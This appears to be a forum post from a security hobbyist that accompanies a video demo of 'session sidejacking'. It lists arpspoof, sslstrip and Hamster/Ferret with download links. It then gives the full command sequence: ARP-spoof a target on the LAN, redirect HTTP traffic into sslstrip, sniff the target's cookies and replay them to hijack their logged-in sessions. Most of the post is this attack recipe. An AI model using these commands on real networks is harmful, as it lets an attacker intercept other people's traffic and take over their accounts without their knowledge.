Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3288793
Download video: http://www.mediafire.com/?4mouo2krmzy
Commands: http://pastebin.com/dEt7SAcS
What is this?
This videos demos, how to "Session Sidejacking". Sidejacking is where you clone your targets cookies therefore your "sharing" their identity for that account (without ever knowing the username or password)!


What do I need?

> arpspoof
> sslstrip
> Hamster (and Ferret)
*all in BackTrack 4 Final*


Software
Name: arpspoof (DSniff)
Version: 2.3
Home Page: http://www.monkey.org/~dugsong/dsniff/
Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

Name: sslstrip
Version: 0.6
Home Page: http://www.thoughtcrime.org/software...rip/index.html
Download Link: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz

Name: Hamster Sidejacking Tool
Version: 2.0
Home Page: http://hamster.erratasec.com/
Download Link: http://hamster.erratasec.com/downloa...er-2.0.0.tar.z


Commands:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.104 192.168.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f

/pentest/sniffers/hamster/ferret -i eth0

/pentest/sniffers/hamster/hamster

Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
Konqueror -> http://hamster


Notes:
Song: Soulwax - Bonkers (As Heard On Radio Soulwax Edit)
Video length: 2:39
Capture length: 3:42

Blog Post: http://g0tmi1k.blogspot.com/2010/03/video-session-sidejacking-ferret-and.html
Forum Post:



~g0tmi1k